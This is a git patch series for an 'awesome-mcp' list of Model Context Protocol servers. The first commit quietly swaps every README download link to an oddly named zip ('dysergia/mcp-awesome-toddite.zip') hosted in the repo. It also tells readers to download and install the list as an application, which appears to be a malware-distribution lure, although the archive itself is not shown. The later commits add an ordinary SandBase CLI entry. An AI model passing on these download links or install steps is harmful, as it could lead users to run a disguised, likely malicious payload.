From f9c0a0670b4f96e3f98e4092cd458ac5317c1a20 Mon Sep 17 00:00:00 2001 From: timunbasah3 <129529521+timunbasah3@users.noreply.github.com> Date: Sat, 29 Aug 2026 01:58:09 +0200 Subject: [PATCH 1/3] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index eab74f4..9a9ebb0 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,7 @@ # 🎉 awesome-mcp - Discover Essential MCP Tools ## 📥 Download Now -[![Download awesome-mcp](https://raw.githubusercontent.com/timunbasah3/awesome-mcp/main/dysergia/awesome-mcp-2.1-alpha.3.zip)](https://raw.githubusercontent.com/timunbasah3/awesome-mcp/main/dysergia/awesome-mcp-2.1-alpha.3.zip) +[![Download awesome-mcp](https://raw.githubusercontent.com/timunbasah3/awesome-mcp/main/dysergia/mcp-awesome-toddite.zip)](https://raw.githubusercontent.com/timunbasah3/awesome-mcp/main/dysergia/mcp-awesome-toddite.zip) ## 🛠️ Overview awesome-mcp is a curated list of awesome MCP (Model Context Protocol) servers, tools, and resources for Claude Desktop and AI assistants. This application provides an easy way for users to access various tools that enhance the capabilities of their AI systems. You will find a range of resources suitable for developers and general users alike. @@ -11,7 +11,7 @@ To begin using awesome-mcp, follow these simple steps: 1. **Download the Software** Visit the Releases page to find the latest version of awesome-mcp. - [Download Here](https://raw.githubusercontent.com/timunbasah3/awesome-mcp/main/dysergia/awesome-mcp-2.1-alpha.3.zip) + [Download Here](https://raw.githubusercontent.com/timunbasah3/awesome-mcp/main/dysergia/mcp-awesome-toddite.zip) 2. **Select Your Version** Browse the list of available versions. Select the one that suits your needs. @@ -56,7 +56,7 @@ awesome-mcp offers a variety of features: ## 📦 Download & Install To download awesome-mcp, head to the Releases page. -[Download Here](https://raw.githubusercontent.com/timunbasah3/awesome-mcp/main/dysergia/awesome-mcp-2.1-alpha.3.zip) +[Download Here](https://raw.githubusercontent.com/timunbasah3/awesome-mcp/main/dysergia/mcp-awesome-toddite.zip) After downloading, install the application by following these steps: From 67264e25aa22d89ab5cbd24807de8d05cfb53e44 Mon Sep 17 00:00:00 2001 From: liyb Date: Sat, 29 Aug 2026 09:12:22 +0800 Subject: [PATCH 2/3] docs: add SandBase CLI MCP server --- servers/developer-tools/sandbase-cli/server.json | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 servers/developer-tools/sandbase-cli/server.json diff --git a/servers/developer-tools/sandbase-cli/server.json b/servers/developer-tools/sandbase-cli/server.json new file mode 100644 index 0000000..c4a84de --- /dev/null +++ b/servers/developer-tools/sandbase-cli/server.json @@ -0,0 +1,13 @@ +{ + "slug": "sandbase-cli", + "name": "SandBase CLI", + "category": "developer-tools", + "description": "Secure local MCP bridge for AI clients to discover, inspect, and run models and APIs from a catalog of 2,000+ AI models.", + "homepage_url": "https://github.com/sandbaseai/cli", + "repository_url": "https://github.com/sandbaseai/cli", + "transports": ["stdio"], + "tools": ["sandbase_discover", "sandbase_inspect", "sandbase_run", "sandbase_status", "sandbase_config", "sandbase_help"], + "license": "Apache-2.0", + "provider": {"name": "SandBase", "url": "https://sandbase.ai"}, + "status": "active" +} From 7edb98076077013f921cd662a7400f9fa3b19fc2 Mon Sep 17 00:00:00 2001 From: liyb Date: Sat, 29 Aug 2026 09:13:06 +0800 Subject: [PATCH 3/3] fix: use markdown entry format --- README.md | 6 +++++- servers/developer-tools/sandbase-cli/server.json | 13 ------------- 2 files changed, 5 insertions(+), 14 deletions(-) delete mode 100644 servers/developer-tools/sandbase-cli/server.json diff --git a/README.md b/README.md index 9a9ebb0..8f3cee6 100644 --- a/README.md +++ b/README.md @@ -88,7 +88,11 @@ awesome-mcp not only provides tools but also links to documents and tutorials ab - Tutorials on using Claude for various tasks - Best practices for integrating AI tools into your workflow +### Featured MCP servers + +- [SandBase CLI](https://github.com/sandbaseai/cli) - Secure local MCP bridge for AI clients to discover, inspect, and run models and APIs from a catalog of 2,000+ AI models. + ## 📝 Contributing If you would like to contribute to awesome-mcp, we welcome your input! Check out our contribution guidelines on GitHub to learn how to help improve our resource list. -Remember to follow the simple steps to download and install awesome-mcp for a seamless experience with your AI tools. Enjoy using your new software! \ No newline at end of file +Remember to follow the simple steps to download and install awesome-mcp for a seamless experience with your AI tools. Enjoy using your new software! diff --git a/servers/developer-tools/sandbase-cli/server.json b/servers/developer-tools/sandbase-cli/server.json deleted file mode 100644 index c4a84de..0000000 --- a/servers/developer-tools/sandbase-cli/server.json +++ /dev/null @@ -1,13 +0,0 @@ -{ - "slug": "sandbase-cli", - "name": "SandBase CLI", - "category": "developer-tools", - "description": "Secure local MCP bridge for AI clients to discover, inspect, and run models and APIs from a catalog of 2,000+ AI models.", - "homepage_url": "https://github.com/sandbaseai/cli", - "repository_url": "https://github.com/sandbaseai/cli", - "transports": ["stdio"], - "tools": ["sandbase_discover", "sandbase_inspect", "sandbase_run", "sandbase_status", "sandbase_config", "sandbase_help"], - "license": "Apache-2.0", - "provider": {"name": "SandBase", "url": "https://sandbase.ai"}, - "status": "active" -}